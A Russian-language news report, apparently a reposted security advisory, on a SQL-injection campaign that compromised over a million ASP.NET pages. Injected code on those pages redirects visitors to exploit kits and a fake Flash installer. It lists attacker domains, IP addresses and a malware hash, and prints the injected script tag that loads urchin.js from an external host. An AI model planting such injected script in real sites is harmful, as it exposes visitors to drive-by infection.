Посетители пораженных web-сайтов перенаправляются на вредоносные ресурсы.
В Интернет появился новый вирус, который заражает web-сайты, посетители которых впоследствии перенаправляются на вредоносные ресурсы.
На момент написания данной новости свыше миллиона сайтов перенаправляют пользователей на ресурсы, содержащие эксплоиты к известным уязвимостям в проигрывателе Flash и среде Java. Первыми, кто сообщил об этой эпидемии стали исследователи Armorize. Для помещения вредоносного кода злоумышленники выполняют SQL-инъекцию на платформах ASP.Net от Microsoft.
Основной массой пораженных систем стали web-сайты больниц, ресторанов, отелей и других предприятий малого и среднего бизнеса. На страницах пораженных сайтов помещены ссылки на такие домены, как jjghui(dot)com (уже заблокирован) и nbnjkl(dot)com. Эти сайты содержат сценарии, перенаправляющие пользователей на страницы, содержащие наборы эксплоитов. Системы, на которых не установлены последние обновления безопасности, могут попасть под полный контроль злоумышленников. IP адреса серверов, задействованных в атаках, находятся в США и России.
Для заражения сайтов злоумышленники используют SQL-инъекцию. После удачной эксплуатации уязвимости, злоумышленники подключают вредоносный файл urchin.js с внешнего сервера. Вследствие компрометации в базу данных приложения внедряется следующий код:
<script src=http://<DOMAIN>/urchin.js></script>Вот список адресов, которые были замечены в атаке
94.102.52.27 (недоступен)
nbnjkl.com (146.185.248.3 - активен)
jjghui.com (недоступен)
nbnjki.com (146.185.248.3 - активен)Загружаемый с внешнего сервера обфуцированный JavaSscript сценарий выглядит следующим образом:
Новый пейлоад генерируется каждые несколько минут. Декодированный javascript выглядит так:
В результате пользователь перенаправляется на сайт www3.strong-scanervqh.rr.nu(178.32.238.105), где ему отображается предложение просмотреть видео. При нажатии на кнопку просмотра видео, пользователю предлагают установить Flash Player.
Скриншот:
Внимание! У Вас нет прав для просмотра скрытого текста.
После нажатия на кнопку установки на систему скачивается файл scandsk.exe (MD5: 351a3810958285c37b72a30d4769dfdd) с сайта www1.firsttdchecker.rr.nu (217.23.11.219), который, согласно данным VirusTotal, читается опасным только 7 из 42 антивирусных приложений.
Согласно поисковой статистике Google, скомпрометировано более 1 млн. страниц. Все скомпрометированные сайты работают на ASP.NET.
Будьте внимательны, и всегда будьте на чеку
сколько людям повторяли не загружать неизвестные файлы.Внимание! Данная статья была написана более полугода назад, актуальность материала и состояние жизни ссылок не гарантируется! Воспользуйтесь дополнительными параметрами для поиска необходимого вам контента! Приносим свои извинения...
Внимание! У статьи пока нет комментариев, оставьте первым свой комментарий?